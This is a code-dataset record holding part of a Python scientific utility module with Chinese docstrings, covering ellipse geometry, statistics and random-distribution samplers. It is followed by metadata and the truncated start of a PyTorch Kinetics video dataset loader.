0\n\n t = 0.0\n\n if 0 < theta < math.pi:\n t = 1 / math.tan(theta)\n d.y = math.sqrt(\n self.D / (self.A * t * t + self.B * t + self.C))\n d.x = t * d.y\n\n if math.pi < theta < 2 * math.pi:\n theta -= math.pi\n t = 1 / math.tan(theta)\n d.y = -math.sqrt(self.D / (self.A * t *\n t + self.B * t + self.C))\n d.x = t * d.y\n\n return d\n\n # circumference 方法缓存\n CIRCUMFERENCE_CACHE: Dict['BaseUtils.Ellipse', float] = dict()\n\n @property\n def circumference(self) -> float:\n \"\"\"\n 计算椭圆周长\n Returns 计算椭圆周长\n\n refactor v0.1.4 添加缓存\n -------\n\n \"\"\"\n c: float = BaseUtils.Ellipse.CIRCUMFERENCE_CACHE.get(self)\n\n if c is None:\n num: int = 3600 * 4\n c: float = 0.0\n for i in range(num):\n c += (\n self.point_at(2.0 * math.pi / float(num) * (i + 1))\n - self.point_at(2.0 * math.pi / float(num) * (i))\n ).length()\n\n BaseUtils.Ellipse.CIRCUMFERENCE_CACHE[self] = c\n\n return c\n\n def point_after(self, length: float) -> P2:\n \"\"\"\n 在椭圆 Ax^2+Bxy+Cy^2=D 上行走 length,返回此时的点\n 规定起点:椭圆与X轴正方向的交点\n 规定行走方向:逆时针\n Parameters\n ----------\n length 行走距离\n\n Returns 椭圆 Ax^2+Bxy+Cy^2=D 上行走 length,返回此时的点\n -------\n\n \"\"\"\n step_theta = BaseUtils.angle_to_radian(0.05)\n theta = 0.0\n while length > 0.0:\n length -= (\n self.point_at(theta + step_theta) - self.point_at(theta)\n ).length()\n\n theta += step_theta\n\n return self.point_at(theta)\n\n def uniform_distribution_points_along_edge(self, num: int) -> List[P2]:\n \"\"\"\n 返回椭圆圆周上均匀分布的 num 个点\n \"\"\"\n points = []\n c = self.circumference\n for i in range(num):\n points.append(self.point_after(c / num * i))\n\n return points\n\n @classmethod\n def create_standard_ellipse(cls, a: float, b: float) -> \"BaseUtils.Ellipse\":\n \"\"\"\n 构建标准椭圆\n x**2/a**2+y**2/b**2 = 1\n\n 则 Ax^2+Bxy+Cy^2=D 中\n A = b**2\n B = 0\n C = a**2\n D = a**2 * b**2\n\n since 0.1.4\n \"\"\"\n return BaseUtils.Ellipse(A=b**2, B=0.0, C=a**2, D=(a**2) * (b**2))\n\n class Statistic:\n \"\"\"\n 统计器\n since v0.1.1\n refactor v0.1.3 增加 add_all 和 helf_width 方法\n \"\"\"\n\n def __init__(self):\n self.__data: List[float] = []\n\n def data(self) -> List[float]:\n \"\"\"\n 获取全部数据\n \"\"\"\n return self.__data\n\n def size(self) -> int:\n \"\"\"\n 元素数目\n \"\"\"\n return len(self.__data)\n\n def add(self, val: float) -> 'BaseUtils.Statistic':\n \"\"\"\n 添加元素\n \"\"\"\n self.__data.append(val)\n return self\n\n def add_all(self, vals: Iterable[float]) -> 'BaseUtils.Statistic':\n \"\"\"\n 添加多个元素\n \"\"\"\n self.__data.extend(vals)\n return self\n\n def max(self) -> float:\n 
\"\"\"\n 最大值\n \"\"\"\n return numpy.max(self.__data)\n\n def absolute_max(self) -> float:\n \"\"\"\n\n \"\"\"\n return numpy.max(numpy.abs(self.__data))\n\n def min(self) -> float:\n \"\"\"\n 最小值\n \"\"\"\n return numpy.min(self.__data)\n\n def var(self) -> float:\n \"\"\"\n 方差\n \"\"\"\n return numpy.var(self.__data)\n\n def average(self) -> float:\n \"\"\"\n 均值\n \"\"\"\n return sum(self.__data) / len(self.__data)\n\n def width(self) -> float:\n \"\"\"\n 宽度\n 即 (max-min)\n 这个方法用于求束斑大小\n \"\"\"\n return (self.max()-self.min())\n\n def half_width(self) -> float:\n \"\"\"\n 半宽\n 即 (max-min)/2\n 这个方法用于求束斑大小\n \"\"\"\n return self.width()/2\n\n def undulate(self) -> float:\n \"\"\"\n 求 abs((max - min) / average)\n \"\"\"\n if self.size() == 1:\n return 0.0\n else:\n max = self.max()\n min = self.min()\n average = self.average()\n if BaseUtils.equal(max, 0, err=1e-5) and BaseUtils.equal(min, 0, err=1e-5):\n return 0.0\n if BaseUtils.equal(average, 0, err=1e-5):\n return 0.0\n\n return abs((max - min) / average)\n\n def clear(self):\n \"\"\"\n 清空\n \"\"\"\n self.__data: List[float] = []\n return self\n\n class Random:\n \"\"\"\n 产生随机分布的类\n 包括以下分布\n uniformly_distributed_along_circumference 单位圆的圆周均匀分布\n uniformly_distributed_in_circle 单位圆内均匀分布\n uniformly_distributed_at_spherical_surface 单位球面均匀分布\n uniformly_distributed_in_sphere 单位球内均匀分布\n uniformly_distributed_along_elliptic_circumference 椭圆的圆周均匀分布\n uniformly_distributed_in_ellipse 椭圆内均匀分布\n uniformly_distributed_at_ellipsoidal_surface 椭球球面均匀分布\n uniformly_distributed_in_ellipsoid 椭球球内均匀分布\n uniformly_distributed_at_hyperespherical_surface 超球体表面均匀分布\n uniformly_distributed_in_hyperesphere 超球体内均匀分布\n uniformly_distributed_at_hypereellipsoidal_surface 超椭球体表面均匀分布\n uniformly_distributed_in_hypereellipsoid 超椭球体内均匀分布\n\n gauss 高斯分布 / 正态分布 2021年2月26日 新增\n gauss_multi_dimension 多维无关高斯分布(标准椭球) 2021年2月26日 新增\n\n 辅助函数\n hypersphere_volume 超球体体积\n hypersphere_area 超球体面积\n\n\n\n since v0.1.4\n \"\"\"\n @classmethod\n def uniformly_distribution(cls,max:float=1.0,min:float=0.0) -> float:\n \"\"\"\n max ~ min 均匀分布\n 新增于 2021年6月17日\n \"\"\"\n if max < min:\n return ValueError(f\"max {max} < min {min}\")\n center = (max+min)/2.0\n width = max - min\n return random.random() * width + center - 0.5 * width\n\n @classmethod\n def uniformly_distributed_along_circumference(cls) -> P2:\n \"\"\"\n 单位圆的圆周均匀分布点\n 原理:生成 [0, 2π) 的均与分布点,就是圆的方位角 azimuth,再转为二维点\n \"\"\"\n azimuth = 2.0 * math.pi * random.random() # [0, 2π)\n return P2(math.cos(azimuth), math.sin(azimuth))\n\n @staticmethod\n def uniformly_distributed_in_circle() -> P2:\n \"\"\"\n 单位圆内均匀分布\n 原理:生成两个 [-1, 1] 分布的点 x y,\n 若 (x,y) 在圆内则返回,否则重试\n \"\"\"\n while True:\n x = random.uniform(-1, 1)\n y = random.uniform(-1, 1)\n if x**2+y**2 <= 1:\n return P2(x, y)\n\n @staticmethod\n def uniformly_distributed_at_spherical_surface() -> P3:\n \"\"\"\n 单位球面均匀分布\n 原理:天顶角 zenith / θ 的取值范围为 [0, π],\n 当具体取值为 θ0 时,对应的圆半径为 sin(θ0),则周长为 2πsin(θ0)\n 因此生成两个随机数 θ/天顶角 和周长位置 a\n θ 的取值范围为 [0, π]\n a 的取值范围为 [0, 2π]\n 若 a < 2πsin(θ0),则 (θ, a) 是圆面上的点,输出\n \"\"\"\n while True:\n zenith = random.uniform(0, math.pi) # 天顶角\n a = random.uniform(0, 2*math.pi)\n if a < 2.0*math.pi*math.sin(zenith):\n azimuth = a / math.sin(zenith) # 方位角\n return P3(\n x=math.sin(zenith)*math.cos(azimuth),\n y=math.sin(zenith)*math.sin(azimuth),\n z=math.cos(zenith)\n )\n\n @staticmethod\n def uniformly_distributed_in_sphere() -> P3:\n \"\"\"\n 单位球内均匀分布\n 原理:产生三个随机数 x y z,为 [-1,1] 上均匀分布\n 若这三个数对应的点在单位球内部,则输出\n \"\"\"\n while True:\n x = random.uniform(-1, 1)\n 
y = random.uniform(-1, 1)\n z = random.uniform(-1, 1)\n if x**2+y**2+z**2 <= 1:\n return P3(x, y, z)\n\n @staticmethod\n def uniformly_distributed_along_elliptic_circumference(a: float, b: float) -> P2:\n \"\"\"\n 椭圆的圆周均匀分布点\n 原理:求椭圆周长 c0,生成 [0, c) 的均与分布点 c,求得方位角度 azimuth,再转为二维点\n\n 椭圆必须是正椭圆\n a 为 x 轴方向轴长度\n b 为 y 轴方向轴长度\n \"\"\"\n e = BaseUtils.Ellipse(A=1/(a**2), C=1/(b**2), B=0.0, D=1.0)\n c0 = e.circumference # 椭圆周长\n\n c = random.uniform(0, c0)\n\n return e.point_after(c)\n\n @staticmethod\n def uniformly_distributed_in_ellipse(a: float, b: float) -> P2:\n \"\"\"\n 椭圆内均匀分布\n 原理:生成两个 [-a, a] 和 [-b, b] 分布的点 x y,\n 若 (x,y) 在椭圆内则返回,否则重试\n\n 椭圆必须是正椭圆\n a 为 x 轴方向轴长度\n b 为 y 轴方向轴长度\n \"\"\"\n while True:\n x = random.uniform(-a, a)\n y = random.uniform(-b, b)\n if (x**2)/(a**2)+(y**2)/(b**2) <= 1:\n return P2(x, y)\n\n @staticmethod\n def uniformly_distributed_at_ellipsoidal_surface(a: float, b: float, c: float) -> P3:\n \"\"\"\n 椭球球面均匀分布\n 原理:天顶角 zenith / θ 的取值范围为 [0, π],\n 当具体取值为 θ0 时,对应的椭圆周长可以计算,设为 c0,最大值为 c_max\n 因此生成两个随机数 θ/天顶角 和周长位置 a\n θ 的取值范围为 [0, π]\n a 的取值范围为 [0, c_max]\n 若 a < c0,则 (θ, a) 是椭圆面上的点,输出\n\n 椭球必须是正椭球\n a 为 x 轴方向轴长度\n b 为 y 轴方向轴长度\n c 为 z 轴方向轴长度\n \"\"\"\n # 椭球在 z=0 平面,即 xy 平面上的 椭圆\n e_xy = BaseUtils.Ellipse(A=1/(a**2), C=1/(b**2), B=0.0, D=1.0)\n\n # 椭球在 zy 平面上的椭圆,且横坐标为 z,纵坐标为 y\n e_zy = BaseUtils.Ellipse(A=1/(c**2), C=1/(b**2), B=0.0, D=1.0)\n\n # 椭球在 zx 平面上的椭圆,且横坐标为 z,纵坐标为 x\n e_zx = BaseUtils.Ellipse(A=1/(c**2), C=1/(a**2), B=0.0, D=1.0)\n\n # e_xy 椭圆的周长\n c_max = e_xy.circumference\n\n while True:\n # 天顶角 / 高度角\n zenith = random.uniform(0, math.pi) # 天顶角\n\n # 可能的周长\n a = random.uniform(0, c_max)\n\n # 由 天顶角 和椭球交点产生的小椭圆 e_cur\n a_cur = e_zx.point_at(zenith).y # ax\n b_cur = e_zy.point_at(zenith).y # by\n\n # 小椭圆 e_cur\n e_cur = BaseUtils.Ellipse(\n A=1/(a_cur**2), C=1/(b_cur**2), B=0.0, D=1.0)\n # 小椭圆周长\n c0_cur = e_cur.circumference\n\n # 如果 a 小于小椭圆周长,则 (zenith,a) 在椭球面上\n if a <= c0_cur:\n # x y 坐标\n p_xy = e_cur.point_after(a)\n # z 坐标\n pz = e_zx.point_at(zenith).x\n return P3(p_xy.x, p_xy.y, pz)\n\n @staticmethod\n def uniformly_distributed_in_ellipsoid(a: float, b: float, c: float) -> P3:\n \"\"\"\n 椭球球内均匀分布\n 原理:产生三个随机数 x y z,为 [-a,a] [-b,b] [-c,c]上均匀分布\n 若这三个数对应的点在单位球内部,则输出\n\n 椭球必须是正椭球\n a 为 x 轴方向轴长度\n b 为 y 轴方向轴长度\n c 为 z 轴方向轴长度\n\n since\n \"\"\"\n while True:\n x = random.uniform(-a, a)\n y = random.uniform(-b, b)\n z = random.uniform(-c, c)\n if (x**2)/(a**2)+(y**2)/(b**2)+(z**2)/(c**2) <= 1:\n return P3(x, y, z)\n\n @classmethod\n def hypersphere_volume(cls, d: int, r: float = 1.0) -> float:\n \"\"\"\n 超球体的体积\n https://baike.baidu.com/item/%E8%B6%85%E7%90%83%E9%9D%A2/4907511?fr=aladdin#2\n\n d 维度\n r 超球体半径\n \"\"\"\n if isinstance(d, int):\n if d % 2 == 1:\n # 维度为奇数\n k = (d-1)//2\n c = (2**d)*(math.factorial(k)) * \\\n (math.pi**k)/(math.factorial(d))\n return c*(r**d)\n else:\n # 维度为偶数\n k = d//2\n c = (math.pi**k)/(math.factorial(k))\n return c*(r**d)\n else:\n raise ValueError(f\"维度{d}必须是整数\")\n\n @classmethod\n def hypersphere_area(cls, d: int, r: float = 1.0) -> float:\n \"\"\"\n 超球体的表面积\n https://baike.baidu.com/item/%E8%B6%85%E7%90%83%E9%9D%A2/4907511?fr=aladdin#2\n\n d 维度\n r 超球体半径\n \"\"\"\n if isinstance(d, int):\n return cls.hypersphere_volume(d, r)*d/r\n else:\n raise ValueError(f\"维度{d}必须是整数\")\n\n @classmethod\n def uniformly_distributed_at_hyperespherical_surface(cls, d: int, r: float = 1.0) -> List[float]:\n \"\"\"\n 超球体面均匀分布\n 递归计算\n\n d 维度\n r 超球体半径\n\n 注意 2 维球体表面分布,指的是圆周分布\n \"\"\"\n if isinstance(d, int):\n if d == 1:\n # 一维直线\n 
raise ValueError(\"一维球无表面\")\n elif d == 2:\n # 二维圆\n p = cls.uniformly_distributed_along_circumference().change_length(r)\n return [p.x, p.y]\n else:\n # 高维\n while True:\n # 第一个维度分布\n fisrt_dim = random.uniform(-r, r)\n # 剩余维度,是一个 d-1 维的超球体,表面积最大为\n area_max = cls.hypersphere_area(d-1, r)\n # 表面积均匀分布\n area_pick = random.uniform(-area_max, area_max)\n\n # 实际上 fisrt_dim 确定后,d-1 维球体的半径为\n r_sub = math.sqrt(r**2-fisrt_dim**2) # bug fixed\n # 这样实际的表面积是\n area_real = cls.hypersphere_area(d-1, r_sub)\n if area_pick <= area_real:\n return [fisrt_dim] + cls.uniformly_distributed_at_hyperespherical_surface(d-1, r_sub)\n else:\n raise ValueError(f\"维度{d}必须是整数\")\n\n @classmethod\n def uniformly_distributed_at_hypereellipsoidal_surface(cls, axes: List[float]) -> List[float]:\n \"\"\"\n 超椭球球面均匀分布\n axes 为各个轴的半轴长,例如[3.5, 7.5, 3.5, 7.5, 0.08]\n !!! 注意:因为超椭球的表面积很难计算(椭圆积分),所以先当作超球体处理,然后各轴拉伸为超椭球\n 这样的分布,不再是标准的均匀分布\n \"\"\"\n dim = len(axes)\n p = cls.uniformly_distributed_at_hyperespherical_surface(dim)\n for i in range(dim):\n p[i] *= axes[i]\n return p\n\n @classmethod\n def uniformly_distributed_in_hypereellipsoid(cls, axes: List[float]) -> List[float]:\n \"\"\"\n 超椭球球内均匀分布\n axes 为各个轴的半轴长,例如[3.5, 7.5, 3.5, 7.5, 0.08]\n \"\"\"\n dim = len(axes)\n while True:\n p = [random.uniform(-axes[i], axes[i]) for i in range(dim)]\n r = 0.0\n for i in range(dim):\n r += (p[i]**2)/(axes[i]**2)\n if r <= 1:\n return p\n\n @classmethod\n def uniformly_distributed_in_hyperesphere(cls, d: int, r: float = 1.0) -> List[float]:\n \"\"\"\n 超球体内均匀分布\n\n d 维度\n r 半径\n \"\"\"\n return cls.uniformly_distributed_in_hypereellipsoid([r]*d)\n\n @classmethod\n def gauss(cls, mu: float = 0.0, sigma: float = 1.0) -> float:\n \"\"\"\n 高斯分布\n\n since v0.1.4\n \"\"\"\n return random.gauss(mu, sigma)\n\n @classmethod\n def gauss_limited(cls, mu: float = 0.0, sigma: float = 1.0, limit: float = 2.0) -> float:\n \"\"\"\n 高斯分布\n\n since v0.1.4\n \"\"\"\n if limit == 0.0 or limit == -0.0:\n raise ValueError(f\"limit 取值不能为 0.0\")\n\n\n limit = abs(limit)\n\n while True:\n r = random.gauss(mu, sigma)\n if r < limit and r > -limit:\n return r\n\n @classmethod\n def gauss_multi_dimension(cls, mu_list: List[float], sigma_list: List[float]) -> List[float]:\n \"\"\"\n 多维无关高斯分布\n\n since v0.1.4\n \"\"\"\n len_mu = len(mu_list)\n len_sigma = len(sigma_list)\n\n if len_mu != len_sigma:\n raise ValueError(\n \"gauss_multi_dimension mu_list 和 sigma_list 维度不同一\")\n\n return [cls.gauss(mu_list[i], sigma_list[i]) for i in range(len_mu)]\n\n class Timer:\n \"\"\"\n 计时器\n 2021年6月16日 新增\n \"\"\"\n\n def __init__(self) -> None:\n self.time = time.time()\n\n def reset(self) -> None:\n self.time = time.time()\n\n def period(self) -> float:\n return time.time() - self.time\n\n @staticmethod\n def combine(list_a: List[T], list_b: List[V]) -> List[Tuple[T, V]]:\n \"\"\"\n 组合\n 输入两个长度一样的数组 [1,2,3...] 
[a,b,c...]\n 返回组合数组 [\n (1,a),\n (2,b),\n (3,c),\n ...\n ]\n\n 2021年6月16日 新增\n \"\"\"\n len_a = len(list_a)\n len_b = len(list_b)\n if len_a != len_b:\n print(f\"数组长度不一致,组合时取小数组\")\n print(f\"list_a = {list_a}\")\n print(f\"list_b = {list_b}\")\n\n length = min(len_a, len_b)\n\n ret: List[Tuple[T, V]] = []\n\n for i in range(length):\n ret.append(\n (list_a[i], list_b[i],)\n )\n\n return ret\n", "repo_name": "madokast/cctpy", "sub_path": "final_code/packages/base_utils.py", "file_name": "base_utils.py", "file_ext": "py", "file_size_in_byte": 39084, "program_lang": "python", "lang": "zh", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "typing.Union", "line_number": 36, "usage_type": "name"}, {"api_name": "packages.point.P2", "line_number": 36, "usage_type": "name"}, {"api_name": "packages.point.P3", "line_number": 36, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 37, "usage_type": "name"}, {"api_name": "packages.point.P2", "line_number": 37, "usage_type": "name"}, {"api_name": "packages.point.P3", "line_number": 37, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 39, "usage_type": "name"}, {"api_name": "packages.point.P2", "line_number": 61, "usage_type": "argument"}, {"api_name": "packages.point.P3", "line_number": 62, "usage_type": "argument"}, {"api_name": "typing.Union", "line_number": 82, "usage_type": "name"}, {"api_name": "packages.point.P2", "line_number": 82, "usage_type": "name"}, {"api_name": "packages.point.P3", "line_number": 82, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 83, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 83, "usage_type": "name"}, {"api_name": "packages.point.P2", "line_number": 83, "usage_type": "name"}, {"api_name": "packages.point.P3", "line_number": 83, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 94, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 94, "usage_type": "name"}, {"api_name": "math.pi", "line_number": 101, "usage_type": "attribute"}, {"api_name": "typing.List", "line_number": 102, "usage_type": "argument"}, {"api_name": "typing.Union", "line_number": 95, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 95, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 109, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 109, "usage_type": "name"}, {"api_name": "math.pi", "line_number": 116, "usage_type": "attribute"}, {"api_name": "typing.List", "line_number": 117, "usage_type": "argument"}, {"api_name": "numpy.ndarray", "line_number": 119, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 120, "usage_type": "call"}, {"api_name": "typing.Union", "line_number": 110, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 110, "usage_type": "name"}, {"api_name": "packages.point.P2", "line_number": 125, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 140, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 143, "usage_type": "call"}, {"api_name": "numpy.linalg.inv", "line_number": 144, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 144, "usage_type": "attribute"}, {"api_name": "packages.point.P2.from_numpy_ndarry", "line_number": 145, "usage_type": "call"}, {"api_name": "packages.point.P2", "line_number": 145, "usage_type": "name"}, {"api_name": "math.sqrt", "line_number": 147, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 148, "usage_type": 
"call"}, {"api_name": "math.sqrt", "line_number": 149, "usage_type": "call"}, {"api_name": "typing.Tuple", "line_number": 125, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 154, "usage_type": "name"}, {"api_name": "numpy.polyfit", "line_number": 165, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 169, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 169, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 186, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 186, "usage_type": "name"}, {"api_name": "packages.point.P2", "line_number": 186, "usage_type": "name"}, {"api_name": "packages.point.P3", "line_number": 186, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 187, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 187, "usage_type": "name"}, {"api_name": "packages.point.P2", "line_number": 187, "usage_type": "name"}, {"api_name": "packages.point.P3", "line_number": 187, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 194, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 194, "usage_type": "name"}, {"api_name": "packages.point.P2", "line_number": 194, "usage_type": "name"}, {"api_name": "packages.point.P3", "line_number": 194, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 200, "usage_type": "name"}, {"api_name": "packages.point.P2", "line_number": 200, "usage_type": "name"}, {"api_name": "packages.point.P3", "line_number": 200, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 195, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 195, "usage_type": "name"}, {"api_name": "packages.point.P2", "line_number": 195, "usage_type": "name"}, {"api_name": "packages.point.P3", "line_number": 195, "usage_type": "name"}, {"api_name": "math.isnan", "line_number": 234, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 242, "usage_type": "name"}, {"api_name": "sys._getframe", "line_number": 258, "usage_type": "call"}, {"api_name": "typing.Callable", "line_number": 268, "usage_type": "name"}, {"api_name": "math.ceil", "line_number": 284, "usage_type": "call"}, {"api_name": "typing.Union", "line_number": 271, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 271, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 271, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 317, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 318, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 318, "usage_type": "name"}, {"api_name": "scipy.integrate.solve_ivp", "line_number": 344, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 323, "usage_type": "attribute"}, {"api_name": "typing.Callable", "line_number": 371, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 372, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 373, "usage_type": "name"}, {"api_name": "multiprocessing.current_process", "line_number": 393, "usage_type": "call"}, {"api_name": "os.cpu_count", "line_number": 422, "usage_type": "call"}, {"api_name": "time.time", "line_number": 428, "usage_type": "call"}, {"api_name": "multiprocessing.Pool", "line_number": 429, "usage_type": "call"}, {"api_name": "time.time", "line_number": 436, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 376, "usage_type": "name"}, {"api_name": "packages.point.P2", "line_number": 491, 
"usage_type": "call"}, {"api_name": "math.pi", "line_number": 494, "usage_type": "attribute"}, {"api_name": "math.pi", "line_number": 496, "usage_type": "attribute"}, {"api_name": "math.pi", "line_number": 497, "usage_type": "attribute"}, {"api_name": "math.pi", "line_number": 499, "usage_type": "attribute"}, {"api_name": "math.sqrt", "line_number": 500, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 503, "usage_type": "attribute"}, {"api_name": "math.sqrt", "line_number": 504, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 509, "usage_type": "attribute"}, {"api_name": "math.tan", "line_number": 510, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 511, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 515, "usage_type": "attribute"}, {"api_name": "math.pi", "line_number": 516, "usage_type": "attribute"}, {"api_name": "math.tan", "line_number": 517, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 518, "usage_type": "call"}, {"api_name": "packages.point.P2", "line_number": 480, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 525, "usage_type": "name"}, {"api_name": "math.pi", "line_number": 544, "usage_type": "attribute"}, {"api_name": "math.pi", "line_number": 545, "usage_type": "attribute"}, {"api_name": "packages.point.P2", "line_number": 552, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 576, "usage_type": "name"}, {"api_name": "packages.point.P2", "line_number": 576, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 611, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 613, "usage_type": "name"}, {"api_name": "typing.Iterable", "line_number": 632, "usage_type": "name"}, {"api_name": "numpy.max", "line_number": 643, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 649, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 649, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 655, "usage_type": "call"}, {"api_name": "numpy.var", "line_number": 661, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 706, "usage_type": "name"}, {"api_name": "random.random", "line_number": 747, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 755, "usage_type": "attribute"}, {"api_name": "random.random", "line_number": 755, "usage_type": "call"}, {"api_name": "packages.point.P2", "line_number": 756, "usage_type": "call"}, {"api_name": "math.cos", "line_number": 756, "usage_type": "call"}, {"api_name": "math.sin", "line_number": 756, "usage_type": "call"}, {"api_name": "packages.point.P2", "line_number": 750, "usage_type": "name"}, {"api_name": "random.uniform", "line_number": 766, "usage_type": "call"}, {"api_name": "random.uniform", "line_number": 767, "usage_type": "call"}, {"api_name": "packages.point.P2", "line_number": 769, "usage_type": "call"}, {"api_name": "packages.point.P2", "line_number": 759, "usage_type": "name"}, {"api_name": "random.uniform", "line_number": 783, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 783, "usage_type": "attribute"}, {"api_name": "random.uniform", "line_number": 784, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 784, "usage_type": "attribute"}, {"api_name": "math.pi", "line_number": 785, "usage_type": "attribute"}, {"api_name": "math.sin", "line_number": 785, "usage_type": "call"}, {"api_name": "math.sin", "line_number": 786, "usage_type": "call"}, {"api_name": "packages.point.P3", "line_number": 787, "usage_type": "call"}, 
{"api_name": "math.sin", "line_number": 788, "usage_type": "call"}, {"api_name": "math.cos", "line_number": 788, "usage_type": "call"}, {"api_name": "math.sin", "line_number": 789, "usage_type": "call"}, {"api_name": "math.cos", "line_number": 790, "usage_type": "call"}, {"api_name": "packages.point.P3", "line_number": 772, "usage_type": "name"}, {"api_name": "random.uniform", "line_number": 801, "usage_type": "call"}, {"api_name": "random.uniform", "line_number": 802, "usage_type": "call"}, {"api_name": "random.uniform", "line_number": 803, "usage_type": "call"}, {"api_name": "packages.point.P3", "line_number": 805, "usage_type": "call"}, {"api_name": "packages.point.P3", "line_number": 794, "usage_type": "name"}, {"api_name": "random.uniform", "line_number": 820, "usage_type": "call"}, {"api_name": "packages.point.P2", "line_number": 808, "usage_type": "name"}, {"api_name": "random.uniform", "line_number": 836, "usage_type": "call"}, {"api_name": "random.uniform", "line_number": 837, "usage_type": "call"}, {"api_name": "packages.point.P2", "line_number": 839, "usage_type": "call"}, {"api_name": "packages.point.P2", "line_number": 825, "usage_type": "name"}, {"api_name": "random.uniform", "line_number": 871, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 871, "usage_type": "attribute"}, {"api_name": "random.uniform", "line_number": 874, "usage_type": "call"}, {"api_name": "packages.point.P3", "line_number": 892, "usage_type": "call"}, {"api_name": "packages.point.P3", "line_number": 842, "usage_type": "name"}, {"api_name": "random.uniform", "line_number": 909, "usage_type": "call"}, {"api_name": "random.uniform", "line_number": 910, "usage_type": "call"}, {"api_name": "random.uniform", "line_number": 911, "usage_type": "call"}, {"api_name": "packages.point.P3", "line_number": 913, "usage_type": "call"}, {"api_name": "packages.point.P3", "line_number": 895, "usage_type": "name"}, {"api_name": "math.factorial", "line_number": 928, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 929, "usage_type": "attribute"}, {"api_name": "math.factorial", "line_number": 929, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 934, "usage_type": "attribute"}, {"api_name": "math.factorial", "line_number": 934, "usage_type": "call"}, {"api_name": "random.uniform", "line_number": 976, "usage_type": "call"}, {"api_name": "random.uniform", "line_number": 980, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 983, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 954, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 992, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 1006, "usage_type": "name"}, {"api_name": "random.uniform", "line_number": 1013, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 1021, "usage_type": "name"}, {"api_name": "random.gauss", "line_number": 1037, "usage_type": "call"}, {"api_name": "random.gauss", "line_number": 1053, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 1058, "usage_type": "name"}, {"api_name": "time.time", "line_number": 1080, "usage_type": "call"}, {"api_name": "time.time", "line_number": 1083, "usage_type": "call"}, {"api_name": "time.time", "line_number": 1086, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 1089, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 1111, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 1111, "usage_type": "name"}, {"api_name": "typing.Tuple", 
"line_number": 1089, "usage_type": "name"}]} +{"seq_id": "26247504368", "text": "import os\nimport numpy as np\nimport warnings\n\nfrom torch.utils.data import Dataset\nfrom openstl.datasets.pipelines.transforms import (Compose, CenterCrop, ClipToTensor,\n Resize, Normalize)\nfrom openstl.datasets.utils import create_loader\n\ntry:\n from decord import VideoReader, cpu\nexcept ImportError:\n VideoReader, cpu = None, None\n\n\ndef int_to_str(num, str_len=6):\n assert isinstance(num, (int, str))\n num = str(num)\n str_num = (str_len - len(num)) * '0' + num\n return str_num\n\n\nclass KineticsDataset(Dataset):\n \"\"\" Video Classification Kinetics Dataset\n `_\n\n Args:\n data_root (str): Path to the dataset.\n list_path (str): Path to the txt list file.\n image_size (int: The target resolution of Human3.6M images.\n pre_seq_length (int): The input sequence length.\n aft_seq_length (int): The output sequence length for prediction.\n frame_sample_rate (int): Sampling step in the time dimension (defaults to 2).\n use_augment (bool): Whether to use augmentations (defaults to False).\n \"\"\"\n\n def __init__(self, data_root, list_path, image_size=256,\n pre_seq_length=4, aft_seq_length=4, 